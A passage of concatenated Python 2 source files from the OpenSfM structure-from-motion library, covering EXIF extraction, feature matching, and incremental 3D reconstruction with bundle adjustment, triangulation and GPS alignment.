r['shots'][shot_id]['vertices'] = vertices
r['shots'][shot_id]['faces'] = faces
data.save_reconstruction(reconstructions, filename='reconstruction.meshed.json')
end = time.time()
with open(data.profile_log(), 'a') as fout:
fout.write('mesh: {0}\n'.format(end - start))
<file_sep>#!/usr/bin/env python
import argparse
import matplotlib.pyplot as pl
import networkx as nx
import numpy as np
from networkx.algorithms import bipartite
from itertools import combinations
from opensfm import dataset
from opensfm import features
from opensfm import reconstruction
from opensfm import io
def plot_features(image, points):
h, w, c = image.shape
p = features.denormalized_image_coordinates(points, w, h)
pl.imshow(image)
pl.plot(p[:,0], p[:,1], 'ob')
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Compute reconstruction')
parser.add_argument('dataset',
help='path to the dataset to be processed')
parser.add_argument('--image',
help='name of the image to show')
parser.add_argument('--save_figs',
help='save figures istead of showing them',
action='store_true')
args = parser.parse_args()
data = dataset.DataSet(args.dataset)
if not args.image:
for image in data.images():
points, desc = data.load_featurs(image)
print "ploting {0} points".format(len(points))
pl.figure()
plot_features(data.image_as_array(image), points)
if args.save_figs:
p = args.dataset + '/plot_features'
io.mkdir_p(p)
pl.savefig(p + '/' + image + '.jpg')
pl.close()
else:
pl.show()
<file_sep>#!/usr/bin/env python
import os.path, sys
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), "..")))
import json
import exifread
import time
import numpy as np
from cv2 import imread
from opensfm.sensors import sensor_data
from opensfm import dataset
from opensfm import exif
def usage():
print 'USAGE: %s data_set_path' % sys.argv[0]
sys.exit(0)
if len(sys.argv) > 1:
path = sys.argv[1]
else:
usage()
start = time.time()
data = dataset.DataSet(path)
images = data.images()
missing_sensors = {}
camera_models = {}
if os.path.exists(data.data_path + '/imagedata.json'):
with open(data.data_path + '/imagedata.json', 'rb') as f:
exif_database = json.loads(f.read())
else:
exif_database = {}
if os.path.exists(data.data_path + '/exif_overrides.json'):
with open(data.data_path + '/exif_overrides.json', 'rb') as f:
exif_overrides = json.loads(f.read())
else:
exif_overrides = {}
for image in images:
print 'Extracting focal lengths for image', image
# EXIF data in Image
exif_data = exif.EXIF(data.load_image(image))
# Image Height and Image Width
if data.config.get('use_exif_size', True):
width, height = exif_data.extract_image_size()
else:
height, width = data.image_as_array(image).shape[:2]
# Make and Model
make, model = exif_data.extract_make(), exif_data.extract_model()
sensor_string = exif.sensor_string(make, model)
# Focal
focal_35, focal_ratio = exif_data.extract_focal()
if focal_ratio == 0:
# try reading data from exif database (imagedata.json) if exist
exif_image = exif_database.get(image)
if exif_image:
model = exif_image.get('model', 'unknown')
make = exif_image.get('make', 'unknown')
sensor_string = exif.sensor_string(make, model)
fmm35, fmm = float(exif_image.get('fmm35', 0)), float(exif_image.get('fmm', 0))
focal_35, focal_ratio = exif.compute_focal(
fmm35,
fmm,
None,
sensor_string
)
if focal_ratio == 0:
missing_sensors[exif.sensor_string(make, model)] = 1
orientation = exif_data.extract_orientation()
d = {
'width': width,
'height': height,
'focal_ratio': focal_ratio,
'focal_35mm_equiv': focal_35,
'camera': sensor_string,
'orientation': orientation
}
# GPS
geo = exif_data.extract_geo()
if exif_database.get(image, {}):
# Check whether gps is provided in a json file (imagedata.json)
exif_image = exif_database[image]
d['gps'] = {}
d['gps']['latitude'] = float(exif_image.get('lat', 0.0))
d['gps']['longitude'] = float(exif_image.get('lon', 0.0))
d['gps']['altitude'] = float(exif_image.get('altitude', 0.0))
d['gps']['dop'] = float(exif_image.get('gps_accuracy', -1))
if d['gps']['dop'] < 0:
del d['gps']['dop']
elif 'latitude' in geo and 'longitude' in geo:
d['gps'] = geo
if image in exif_overrides:
for key, value in exif_overrides[image].items():
d[key] = value
if sensor_string not in camera_models:
camera_models[d['camera']] = {
'width': d['width'],
'height': d['height'],
'focal_ratio': d['focal_ratio'],
'focal_35mm_equiv': d['focal_35mm_equiv'],
"focal": d['focal_ratio'],
"exif_focal": d['focal_ratio']
}
distortion = exif_data.extract_distortion()
if distortion is not None:
camera_models[d['camera']].update({'k1': distortion[0], 'k2': distortion[1]})
d.update({'k1': distortion[0], 'k2': distortion[1]})
data.save_exif(image, d)
with open(data.data_path+'/missing_sensor.json', 'w') as fout:
fout.write(json.dumps(missing_sensors, indent=4))
data.save_camera_models(camera_models)
end = time.time()
with open(data.profile_log(), 'a') as fout:
fout.write('focal_from_exif: {0}\n'.format(end - start))
<file_sep>#!/usr/bin/env bash
set -e
DIR=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )
$DIR/focal_from_exif $1
$DIR/detect_features $1
$DIR/match_features $1
$DIR/create_tracks $1
$DIR/reconstruct $1
<file_sep># -*- coding: utf-8 -*-
from collections import defaultdict
from itertools import combinations
import os
from subprocess import call, Popen, PIPE
import tempfile
import datetime
from itertools import combinations
import numpy as np
import cv2
import json
import time
import networkx as nx
from networkx.algorithms import bipartite
from opensfm import transformations as tf
from opensfm import dataset
from opensfm import features
from opensfm import multiview
from opensfm import geo
from opensfm import csfm
def bundle(graph, reconstruction, config):
'''Bundle adjust a reconstruction.
'''
start = time.time()
ba = csfm.BundleAdjuster()
for k, v in reconstruction['cameras'].items():
ba.add_camera(str(k), v['focal'], v['k1'], v['k2'],
v['exif_focal'], False)
for k, v in reconstruction['shots'].items():
r = v['rotation']
t = v['translation']
g = v['gps_position']
ba.add_shot(
str(k), str(v['camera']),
r[0], r[1], r[2],
t[0], t[1], t[2],
g[0], g[1], g[2],
v['gps_dop'], False
)
for k, v in reconstruction['points'].items():
x = v['coordinates']
ba.add_point(str(k), x[0], x[1], x[2], False)
for shot in reconstruction['shots']:
for track in graph[shot]:
if track in reconstruction['points']:
ba.add_observation(str(shot), str(track), *graph[shot][track]['feature'])
ba.set_loss_function(config.get('loss_function', 'TruncatedLoss'),
config.get('loss_function_threshold', 0.004));
ba.set_reprojection_error_sd(config.get('reprojection_error_sd', 1))
ba.set_focal_prior_sd(config.get('exif_focal_sd', 999));
setup = time.time()
ba.run()
print ba.brief_report()
run = time.time()
for k, v in reconstruction['cameras'].items():
c = ba.get_camera(str(k))
v['focal'] = c.focal
v['k1'] = c.k1
v['k2'] = c.k2
for k, v in reconstruction['shots'].items():
s = ba.get_shot(str(k))
v['rotation'] = [s.rx, s.ry, s.rz]
v['translation'] = [s.tx, s.ty, s.tz]
for k, v in reconstruction['points'].items():
p = ba.get_point(str(k))
v['coordinates'] = [p.x, p.y, p.z]
teardown = time.time()
print 'setup/run/teardown {0}/{1}/{2}'.format(setup - start, run - setup, teardown - run)
def pairwise_reconstructability(common_tracks, homography_inliers):
outliers = common_tracks - homography_inliers
outlier_ratio = float(outliers) / common_tracks
if outlier_ratio > 0.3:
return common_tracks
else:
return 0
def compute_image_pairs(graph, image_graph, config):
'''All matched image pairs sorted by reconstructability.
'''
pairs = []
score = []
for im1, im2, d in image_graph.edges(data=True):
tracks, p1, p2 = dataset.common_tracks(graph, im1, im2)
if len(tracks) >= 100:
H, inliers = cv2.findHomography(p1, p2, cv2.RANSAC, config.get('homography_threshold', 0.004))
r = pairwise_reconstructability(len(tracks), inliers.sum())
if r > 0:
pairs.append((im1,im2))
score.append(r)
order = np.argsort(-np.array(score))
return [pairs[o] for o in order]
def add_gps_position(data, reconstruction, image):
exif = data.load_exif(image)
reflla = data.load_reference_lla()
if 'gps' in exif:
lat = exif['gps']['latitude']
lon = exif['gps']['longitude']
alt = 2.0 #exif['gps'].get('altitude', 0)
x, y, z = geo.topocentric_from_lla(lat, lon, alt, *reflla)
reconstruction['shots'][image]['gps_position'] = [x, y, z]
reconstruction['shots'][image]['gps_dop'] = exif['gps'].get('dop', 15.0)
else:
reconstruction['shots'][image]['gps_position'] = [0.0, 0.0, 0.0]
reconstruction['shots'][image]['gps_dop'] = 999999.0
reconstruction['shots'][image]['exif_orientation'] = exif.get('orientation', 1)
def bootstrap_reconstruction(data, graph, im1, im2):
'''Starts a reconstruction using two shots.
'''
print 'Initial reconstruction with', im1, 'and', im2
d1 = data.load_exif(im1)
d2 = data.load_exif(im2)
cameras = data.load_camera_models()
tracks, p1, p2 = dataset.common_tracks(graph, im1, im2)
print 'Number of common tracks', len(tracks)
f1 = d1['focal_ratio']
f2 = d2['focal_ratio']
threshold = data.config.get('five_point_algo_threshold', 0.006)
R, t, inliers = csfm.two_view_reconstruction(p1, p2, f1, f2, threshold)
if len(inliers):
print 'Number of inliers', len(inliers)
reconstruction = {
"cameras": cameras,
"shots" : {
im1: {
"camera": str(d1['camera']),
"rotation": [0.0, 0.0, 0.0],
"translation": [0.0, 0.0, 0.0],
},
im2: {
"camera": str(d2['camera']),
"rotation": list(cv2.Rodrigues(R)[0].flat),
"translation": list(t),
},
},
"points" : {
},
}
add_gps_position(data, reconstruction, im1)
add_gps_position(data, reconstruction, im2)
triangulate_shot_features(
graph, reconstruction, im1,
data.config.get('triangulation_threshold', 0.004),
data.config.get('triangulation_min_ray_angle', 2.0))
print 'Number of reconstructed 3D points :{}'.format(len(reconstruction['points']))
if len(reconstruction['points']) > data.config.get('five_point_algo_min_inliers', 50):
print 'Found initialize good pair', im1 , 'and', im2
return reconstruction
print 'Pair', im1, ':', im2, 'fails'
return None
def reconstructed_points_for_images(graph, reconstruction, images):
res = []
for image in images:
if image not in reconstruction['shots']:
common_tracks = 0
for track in graph[image]:
if track in reconstruction['points']:
common_tracks += 1
res.append((image, common_tracks))
return sorted(res, key=lambda x: -x[1])
def rotate(angleaxis, point):
R = cv2.Rodrigues(np.array(angleaxis, dtype=float))[0]
return R.dot(np.array(point))
def camera_coordinates(camera, shot, point):
p = rotate(shot['rotation'], point)
p += shot['translation']
return p
def back_project(camera, shot, pixel, depth):
K = multiview.K_from_camera(camera)
R = cv2.Rodrigues(np.array(shot['rotation'], dtype=float))[0]
t = shot['translation']
A = K.dot(R)
b = depth * np.array([pixel[0], pixel[1], 1]) - K.dot(t)
return np.linalg.solve(A, b)
def reproject(camera, shot, point):
''' Reproject 3D point onto image plane given a camera
'''
p = rotate(shot['rotation'], point['coordinates'])
p += shot['translation']
xp = p[0] / p[2]
yp = p[1] / p[2]
l1 = camera.get('k1', 0.0)
l2 = camera.get('k2', 0.0)
r2 = xp * xp + yp * yp
distortion = 1.0 + r2 * (l1 + l2 * r2)
x_reproject = camera['focal'] * distortion * xp
y_reproject = camera['focal'] * distortion * yp
return np.array([x_reproject, y_reproject])
def single_reprojection_error(camera, shot, point, observation):
''' Reprojection error of a single points
'''
point_reprojected = reproject(camera, shot, point)
err = point_reprojected - observation
return np.linalg.norm(err)
def reprojection_error(graph, reconstruction):
errors = []
for shot_id in reconstruction['shots']:
for track_id in graph[shot_id]:
if track_id in reconstruction['points']:
observation = graph[shot_id][track_id]['feature']
shot = reconstruction['shots'][shot_id]
camera = reconstruction['cameras'][shot['camera']]
point = reconstruction['points'][track_id]
errors.append(single_reprojection_error(camera, shot, point, observation))
return np.median(errors)
def reprojection_error_track(track, graph, reconstruction):
errors = []
error = 999999999.
if track in reconstruction['points']:
for shot_id in graph[track]:
observation = graph[shot_id][track]['feature']
if shot_id in reconstruction['shots']:
shot = reconstruction['shots'][shot_id]
camera = reconstruction['cameras'][shot['camera']]
point = reconstruction['points'][track]
errors.append(single_reprojection_error(camera, shot, point, observation))
if errors:
error = np.max(errors)
else:
error = 999999999.
return error
def resect(data, graph, reconstruction, shot_id):
'''Add a shot to the reconstruction.
'''
xs = []
Xs = []
for track in graph[shot_id]:
if track in reconstruction['points']:
xs.append(graph[shot_id][track]['feature'])
Xs.append(reconstruction['points'][track]['coordinates'])
x = np.array(xs)
X = np.array(Xs)
if len(x) < 5:
return False
exif = data.load_exif(shot_id)
camera_model = exif['camera']
K = multiview.K_from_camera(reconstruction['cameras'][camera_model])
dist = np.array([0,0,0,0.])
# Prior on focal length
R, t, inliers = cv2.solvePnPRansac(X.astype(np.float32), x.astype(np.float32), K, dist,
reprojectionError=data.config.get('resection_threshold', 0.004))
if inliers is None:
print 'Resection', shot_id, 'no inliers'
return False
print 'Resection', shot_id, 'inliers:', len(inliers), '/', len(x)
if len(inliers) >= data.config.get('resection_min_inliers', 15):
reconstruction['shots'][shot_id] = {
"camera": camera_model,
"rotation": list(R.flat),
"translation": list(t.flat),
}
add_gps_position(data, reconstruction, shot_id)
return True
else:
return False
def Rt_from_shot(shot):
Rt = np.empty((3, 4))
Rt[:,:3] = cv2.Rodrigues(np.array(shot['rotation'], dtype=float))[0]
Rt[:, 3] = shot['translation']
return Rt
def projection_matrix(camera, shot):
K = multiview.K_from_camera(camera)
Rt = Rt_from_shot(shot)
return np.dot(K, Rt)
def angle_between_rays(KR11, x1, KR12, x2):
v1 = KR11.dot([x1[0], x1[1], 1])
v2 = KR12.dot([x2[0], x2[1], 1])
return multiview.vector_angle(v1, v2)
def triangulate_track(track, graph, reconstruction, P_by_id, KR1_by_id, Kinv_by_id, reproj_threshold, min_ray_angle=2.0):
''' Triangulate a track
'''
Ps, Ps_initial, KR1_initial, Kinv_initial = [], [], [], []
xs, xs_initial = [], []
for shot in graph[track]:
if shot in reconstruction['shots']:
if shot not in P_by_id:
s = reconstruction['shots'][shot]
c = reconstruction['cameras'][s['camera']]
P = projection_matrix(c, s)
P_by_id[shot] = P
KR1_by_id[shot] = np.linalg.inv(P[:,:3])
Kinv_by_id[shot] = np.linalg.inv(multiview.K_from_camera(c))
Ps_initial.append(P_by_id[shot])
xs_initial.append(graph[track][shot]['feature'])
KR1_initial.append(KR1_by_id[shot])
Kinv_initial.append(Kinv_by_id[shot])
valid_set = []
if len(Ps_initial) >= 2:
max_angle = 0
for i, j in combinations(range(len(Ps_initial)), 2):
angle = angle_between_rays(
KR1_initial[i], xs_initial[i], KR1_initial[j], xs_initial[j])
if 1:
if i not in valid_set:
valid_set.append(i)
if j not in valid_set:
valid_set.append(j)
max_angle = max(angle, max_angle)
if max_angle > np.radians(min_ray_angle):
for k in valid_set:
Ps.append(np.dot(Kinv_initial[k], Ps_initial[k] ))
xx = np.dot(Kinv_initial[k][:2,:], multiview.homogeneous(np.array(xs_initial[k])))
xs.append(xx[0:2])
X = multiview.triangulate(Ps, xs)
error = 0
Xh = multiview.homogeneous(X)
for P, x in zip(Ps, xs):
xx, yy, zz = P.dot(Xh)
if zz <= 0:
error = 999999999.0
reprojected_x = np.array([xx / zz, yy / zz])
error = max(error, (reprojected_x - x).max())
if error < reproj_threshold:
reconstruction['points'][track] = {
"coordinates": list(X),
}
def triangulate_shot_features(graph, reconstruction, shot_id, reproj_threshold, min_ray_angle):
'''Reconstruct as many tracks seen in shot_id as possible.
'''
P_by_id = {}
KR1_by_id = {}
Kinv_by_id = {}
for track in graph[shot_id]:
if track not in reconstruction['points']:
triangulate_track(track, graph, reconstruction, P_by_id, KR1_by_id, Kinv_by_id, reproj_threshold, min_ray_angle)
def retriangulate(graph, reconstruction, image_graph, config):
'''Re-triangulate 3D points
'''
P_by_id = {}
KR1_by_id = {}
Kinv_by_id = {}
shots = reconstruction['shots']
points = reconstruction['points']
points_added = 0
tracks_added = []
points_before = len(points)
for im1, im2, d in image_graph.edges(data=True):
if (im1 in shots) and (im2 in shots):
tracks, p1, p2 = dataset.common_tracks(graph, im1, im2)
# find already reconstructed tracks
diff = np.setdiff1d(tracks, points.keys())
reconstruct_ratio = 1 - len(diff)/float(len(tracks))
if reconstruct_ratio < 0.3:
for track in diff:
if track not in tracks_added:
triangulate_track(track, graph, reconstruction, P_by_id, KR1_by_id, Kinv_by_id, reproj_threshold=0.006)
points_added += 1
tracks_added.append(track)
# bundle adjustment
bundle(graph, reconstruction, config)
# filter points with large reprojection errors
track_to_delete = []
for track in tracks_added:
error = reprojection_error_track(track, graph, reconstruction)
if error > config.get('triangulation_threshold', 0.004):
track_to_delete.append(track)
print 'Add {0} points after retriangulation.'.format(len(reconstruction['points']) - points_before)
for t in track_to_delete:
if t in reconstruction['points']:
del reconstruction['points'][t]
# bundle adjustment
bundle(graph, reconstruction, config)
def retriangulate_all(graph, reconstruction, image_graph, config):
'''
Retrianguate all points
'''
triangulation_threshold = config.get('retriangulation_threshold', 0.004)
min_ray_angle = config.get('triangulation_min_ray_angle', 2.0)
P_by_id = {}
KR1_by_id = {}
Kinv_by_id = {}
tracks, images = tracks_and_images(graph)
for track in tracks:
triangulate_track(track, graph, reconstruction, P_by_id, KR1_by_id, Kinv_by_id, triangulation_threshold, min_ray_angle)
# bundle adjustment
bundle(graph, reconstruction, config)
def optical_center(shot):
R = cv2.Rodrigues(np.array(shot['rotation'], dtype=float))[0]
t = shot['translation']
return -R.T.dot(t)
def viewing_direction(shot):
""" Calculates the viewing direction for a shot.
:param shot: The shot.
:return: The viewing direction.
"""
R = cv2.Rodrigues(np.array(shot['rotation'], dtype=float))[0]
t = np.array([0, 0, 1])
return R.T.dot(t)
def apply_similarity(reconstruction, s, A, b):
"""Apply a similarity (y = s A x + t) to a reconstruction.
:param reconstruction: The reconstruction to transform.
:param s: The scale (a scalar)
:param A: The rotation matrix (3x3)
:param b: The translation vector (3)
"""
# Align points.
for point in reconstruction['points'].values():
Xp = s * A.dot(point['coordinates']) + b
point['coordinates'] = list(Xp)
# Align cameras.
for shot in reconstruction['shots'].values():
R = cv2.Rodrigues(np.array(shot['rotation']))[0]
t = np.array(shot['translation'])
Rp = R.dot(A.T)
tp = -Rp.dot(b) + s * t
shot['rotation'] = list(cv2.Rodrigues(Rp)[0].flat)
shot['translation'] = list(tp)
def align_reconstruction_naive(reconstruction):
if len(reconstruction['shots']) < 3: return
# Compute similarity Xp = s A X + b
X, Xp = [], []
for shot in reconstruction['shots'].values():
X.append(optical_center(shot))
Xp.append(shot['gps_position'])
X = np.array(X)
Xp = np.array(Xp)
T = tf.superimposition_matrix(X.T, Xp.T, scale=True)
A, b = T[:3,:3], T[:3,3]
s = np.linalg.det(A)**(1./3)
A /= s
apply_similarity(reconstruction, s, A, b)
def get_horitzontal_and_vertical_directions(R, orientation):
'''Get orientation vectors from camera rotation matrix and orientation tag.
Return a 3D vectors pointing to the positive XYZ directions of the image.
X points to the right, Y to the bottom, Z to the front.
'''
# See http://sylvana.net/jpegcrop/exif_orientation.html
if orientation == 1:
return R[0, :], R[1, :], R[2, :]
if orientation == 2:
return -R[0, :], R[1, :], -R[2, :]
if orientation == 3:
return -R[0, :], -R[1, :], R[2, :]
if orientation == 4:
return R[0, :], -R[1, :], R[2, :]
if orientation == 5:
return R[1, :], R[0, :], -R[2, :]
if orientation == 6:
return R[1, :], -R[0, :], R[2, :]
if orientation == 7:
return -R[1, :], -R[0, :], -R[2, :]
if orientation == 8:
return -R[1, :], R[0, :], R[2, :]
print 'ERROR unknown orientation', orientation
def align_reconstruction(reconstruction, config):
align_method = config.get('align_method', 'orientation_prior')
if align_method == 'orientation_prior':
return align_reconstruction_orientation_prior(reconstruction, config)
elif align_method == 'naive':
return align_reconstruction_naive(reconstruction)
def align_reconstruction_orientation_prior(reconstruction, config):
X, Xp = [], []
orientation_type = config.get('align_orientation_prior', 'horizontal')
onplane, verticals = [], []
for shot in reconstruction['shots'].values():
X.append(optical_center(shot))
Xp.append(shot['gps_position'])
R = cv2.Rodrigues(np.array(shot['rotation']))[0]
x, y, z = get_horitzontal_and_vertical_directions(R, shot['exif_orientation'])
if orientation_type == 'no_roll':
onplane.append(x)
verticals.append(-y)
elif orientation_type == 'horizontal':
onplane.append(x)
onplane.append(z)
verticals.append(-y)
elif orientation_type == 'vertical':
onplane.append(x)
onplane.append(y)
verticals.append(-z)
X = np.array(X)
Xp = np.array(Xp)
# Estimate ground plane.
p = multiview.fit_plane(X - X.mean(axis=0), onplane, verticals)
Rplane = multiview.plane_horizontalling_rotation(p)
X = Rplane.dot(X.T).T
# Estimate 2d similarity to align to GPS
if (len(X) < 2 or
X.std(axis=0).max() < 1e-8 or # All points are the same.
Xp.std(axis=0).max() < 0.01): # All GPS points are the same.
s = len(X) / max(1e-8, X.std(axis=0).max()) # Set the arbitrary scale proportional to the number of cameras.
A = Rplane
b = Xp.mean(axis=0) - X.mean(axis=0)
else:
T = tf.affine_matrix_from_points(X.T[:2], Xp.T[:2], shear=False)
s = np.linalg.det(T[:2,:2])**(1./2)
A = np.eye(3)
A[:2,:2] = T[:2,:2] / s
A = A.dot(Rplane)
b = np.array([T[0,2],
T[1,2],
Xp[:,2].mean() - s * X[:,2].mean()]) # vertical alignment
apply_similarity(reconstruction, s, A, b)
def register_reconstruction_with_gps(reconstruction, reference):
"""
register reconstrution with gps positions and compass angles
"""
shots = reconstruction['shots']
for shot_id, shot in shots.iteritems():
gps = {}
topo = optical_center(shot)
lat, lon, alt = geo.lla_from_topocentric(topo[0], topo[1], topo[2],
reference['latitude'], reference['longitude'], reference['altitude'])
# find direction
shot['translation'][2] -= 1
topo2 = optical_center(shot)
dz = topo2 - topo
angle = np.rad2deg(np.arctan2(dz[0], dz[1]))
reconstruction['shots'][shot_id]['gps'] = {
'lon': lon,
'lat': lat,
'altitude': alt,
'direction': angle
}
def merge_two_reconstructions(r1, r2, config, threshold=1):
''' Merge two reconstructions with common tracks
'''
t1, t2 = r1['points'], r2['points']
common_tracks = list(set(t1) & set(t2))
# print 'Number of common tracks between two reconstructions: {0}'.format(len(common_tracks))
if len(common_tracks) > 6:
# Estimate similarity transform
p1 = np.array([t1[t]['coordinates'] for t in common_tracks])
p2 = np.array([t2[t]['coordinates'] for t in common_tracks])
T, inliers = multiview.fit_similarity_transform(p1, p2, max_iterations=1000, threshold=threshold)
if len(inliers) >= 10:
s, A, b = multiview.decompose_similarity_transform(T)
r1p = r1
apply_similarity(r1p, s, A, b)
r = r2
r['shots'].update(r1p['shots'])
r['points'].update(r1p['points'])
align_reconstruction(r, config)
return [r]
else:
return [r1, r2]
else:
return [r1, r2]
def merge_reconstructions(reconstructions, config):
''' Greedily merge reconstructions with common tracks
'''
num_reconstruction = len(reconstructions)
ids_reconstructions = np.arange(num_reconstruction)
remaining_reconstruction = ids_reconstructions
reconstructions_merged = []
num_merge = 0
pairs = []
for (i, j) in combinations(ids_reconstructions, 2):
if (i in remaining_reconstruction) and (j in remaining_reconstruction):
r = merge_two_reconstructions(reconstructions[i], reconstructions[j], config)
if len(r) == 1:
remaining_reconstruction = list(set(remaining_reconstruction) - set([i, j]))
for k in remaining_reconstruction:
rr = merge_two_reconstructions(r[0], reconstructions[k], config)
if len(r) == 2:
break
else:
r = rr
remaining_reconstruction = list(set(remaining_reconstruction) - set([k]))
reconstructions_merged.append(r[0])
num_merge += 1
for k in remaining_reconstruction:
reconstructions_merged.append(reconstructions[k])
print 'Merged {0} reconstructions.'.format(num_merge)
return reconstructions_merged
def paint_reconstruction(data, graph, reconstruction):
to_paint = defaultdict(list)
to_paint_track = defaultdict(list)
for track in reconstruction['points']:
for shot in graph[track]:
to_paint[shot].append(graph[track][shot]['feature'])
to_paint_track[shot].append(track)
track_colors = {track: np.zeros(3) for track in reconstruction['points']}
track_sum = {track: 0 for track in reconstruction['points']}
for shot in to_paint:
points = np.array(to_paint[shot])
tracks = to_paint_track[shot]
im = data.image_as_array(shot)
pixels = features.denormalized_image_coordinates(points, im.shape[1], im.shape[0]).astype(int)
colors = im[pixels[:,1], pixels[:,0]]
for track, color in zip(tracks, colors):
track_colors[track] += color
track_sum[track] += 1
for track in reconstruction['points']:
c = track_colors[track] / track_sum[track]
reconstruction['points'][track]['color'] = list(c)
def paint_reconstruction_constant(data, graph, reconstruction):
for track in reconstruction['points']:
reconstruction['points'][track]['color'] = [200, 180, 255]
def grow_reconstruction(data, graph, reconstruction, images, image_graph):
bundle_interval = data.config.get('bundle_interval', 1)
retriangulation = data.config.get('retriangulation', False)
retriangulation_ratio = data.config.get('retriangulation_ratio', 1.25)
bundle(graph, reconstruction, data.config)
align_reconstruction(reconstruction, data.config)
prev_num_points = len(reconstruction['points'])
num_shots_reconstructed = len(reconstruction['shots'])
while True:
if data.config.get('save_partial_reconstructions', False):
paint_reconstruction_constant(data, graph, reconstruction)
data.save_reconstruction(reconstruction, 'reconstruction.{}.json'.format(
datetime.datetime.now().isoformat().replace(':', '_')))
common_tracks = reconstructed_points_for_images(graph, reconstruction, images)
if not common_tracks:
break
for image, num_tracks in common_tracks:
if resect(data, graph, reconstruction, image):
print '-------------------------------------------------------'
print 'Adding {0} to the reconstruction'.format(image)
images.remove(image)
if len(reconstruction['shots']) % bundle_interval == 0:
bundle(graph, reconstruction, data.config)
triangulate_shot_features(
graph, reconstruction, image,
data.config.get('triangulation_threshold', 0.004),
data.config.get('triangulation_min_ray_angle', 2.0))
if len(reconstruction['shots']) % bundle_interval == 0:
bundle(graph, reconstruction, data.config)
align_reconstruction(reconstruction, data.config)
num_points = len(reconstruction['points'])
if retriangulation and num_points > prev_num_points * retriangulation_ratio:
print 'Re-triangulating'
retriangulate_all(graph, reconstruction, image_graph, data.config)
prev_num_points = len(reconstruction['points'])
print ' Reprojection Error:', reprojection_error(graph, reconstruction)
if data.config.get('bundle_outlier_threshold', 0.008) > 0:
track_outlier = []
for track in reconstruction['points']:
error = reprojection_error_track(track, graph, reconstruction)
if error > data.config.get('bundle_outlier_threshold', 0.008):
track_outlier.append(track)
for track in track_outlier:
del reconstruction['points'][track]
print 'Remove {0} outliers'.format(len(track_outlier))
break
else:
print 'Some images can not be added'
break
align_reconstruction(reconstruction, data.config)
print 'Reprojection Error:', reprojection_error(graph, reconstruction)
print 'Painting the reconstruction from {0} cameras'.format(len(reconstruction['shots']))
paint_reconstruction(data, graph, reconstruction)
print 'Done.'
return reconstruction
def nonfisheye_cameras(data, images):
fisheye = [
"gopro hero3+ black edition",
"gopro hero2",
]
res = []
for image in images:
exif = data.load_exif(image)
if exif['camera'] not in fisheye and 1 <= exif['orientation'] <= 8:
res.append(image)
return res
def tracks_and_images(graph):
tracks, images = [], []
for n in graph.nodes(data=True):
if n[1]['bipartite'] == 0:
images.append(n[0])
else:
tracks.append(n[0])
return tracks, images
def incremental_reconstruction(data):
data.invent_reference_lla()
graph = data.load_tracks_graph()
tracks, images = tracks_and_images(graph)
remaining_images = set(nonfisheye_cameras(data, images))
print 'images', len(images)
print 'nonfisheye images', len(remaining_images)
image_graph = bipartite.weighted_projected_graph(graph, images)
reconstructions = []
pairs = compute_image_pairs(graph, image_graph, data.config)
for im1, im2 in pairs:
if im1 in remaining_images and im2 in remaining_images:
reconstruction = bootstrap_reconstruction(data, graph, im1, im2)
if reconstruction:
remaining_images.remove(im1)
remaining_images.remove(im2)
reconstruction = grow_reconstruction(data, graph, reconstruction, remaining_images, image_graph)
reconstructions.append(reconstruction)
reconstructions = sorted(reconstructions, key=lambda x: -len(x['shots']))
data.save_reconstruction(reconstructions)
for k, r in enumerate(reconstructions):
print 'Reconstruction', k, ':', len(r['shots']), 'images', ',', len(r['points']),'points'
print len(reconstructions), 'partial reconstructions in total.'
<file_sep>#!/usr/bin/env python
import os.path, sys
import time
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), "..")))
from multiprocessing import Pool
import numpy as np
import cv2
from itertools import combinations
import argparse
from opensfm import dataset
from opensfm import features
from opensfm import matching
from opensfm import geo
def match(imagepair):
im1, im2, i, n = imagepair
print 'Matching', data.feature_type().upper(), 'for image', im1, 'with image', im2, ' - ', i, '/', n, ' - ', 100 * i / n, '%'
matching_gps_distance = data.config.get('matching_gps_distance', 9999999)
robust_matching_min_match = data.config.get('robust_matching_min_match', 20)
preemptive_threshold = data.config.get('preemptive_threshold', 1)
# gps distance
distance = 0
if im1 in exifs and im2 in exifs:
gps1 = exifs[im1].get('gps',{})
gps2 = exifs[im2].get('gps',{})
if gps1 and gps2:
lon1, lat1 = gps1['longitude'], gps1['latitude']
lon2, lat2 = gps2['longitude'], gps2['latitude']
distance = geo.gps_distance([lon1,lat1], [lon2, lat2])
if distance > matching_gps_distance:
print "Discarding based on GPS distance {0} > {1}".format(distance, matching_gps_distance)
return
# preemptive matching
t = time.time()
lowes_ratio = data.config.get('lowes_ratio', 0.6)
data.config['lowes_ratio'] = data.config.get('preemptive_lowes_ratio', 0.6)
matches_pre = matching.match_lowe_bf(f_pre[im1], f_pre[im2], data.config)
data.config['lowes_ratio'] = lowes_ratio
print "Preemptive matching {0}, time: {1}s".format(len(matches_pre), time.time()-t)
if len(matches_pre) < preemptive_threshold:
print "Discarding based of preemptive matches {0} < {1}".format(len(matches_pre), preemptive_threshold)
return
# symmetric matching
t = time.time()
p1, f1 = data.load_features(im1)
i1 = data.load_feature_index(im1, f1)
p2, f2 = data.load_features(im2)
i2 = data.load_feature_index(im2, f2)
matches = matching.match_symmetric(f1, i1, f2, i2, data.config)
if len(matches) < robust_matching_min_match:
return
print 'Full feature matching time of {0} - {2} : {1}s'.format(len(f1), time.time() - t, len(f2))
# robust matching
t_robust_matching = time.time()
rmatches = matching.robust_match(p1, p2, matches, data.config)
if len(rmatches) < robust_matching_min_match:
return
print 'Robust matching time : {0}s'.format(time.time() - t_robust_matching)
data.save_matches(im1, im2, rmatches)
print "Full matching {0} / {1}, time: {2}s".format(len(rmatches), len(matches), time.time() - t)
def image_pairs(images):
l = len(images)
n = l * (l - 1) / 2
for i, (a, b) in enumerate(combinations(images, 2)):
yield a, b, i, n
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Match features between all image pairs.')
parser.add_argument('dataset', help='path to the dataset to be processed')
args = parser.parse_args()
data = dataset.DataSet(args.dataset)
images = data.images()
matcher_type = data.matcher_type()
print 'Loading preemptive data'
exifs = {}
p_pre, f_pre = {}, {}
for image in images:
sys.stdout.write('.')
sys.stdout.flush()
p_pre[image], f_pre[image] = data.load_preemtive_features(image)
preemptive_max = min(data.config.get('preemptive_max', p_pre[image].shape[0]), p_pre[image].shape[0])
p_pre[image] = p_pre[image][:preemptive_max,:]
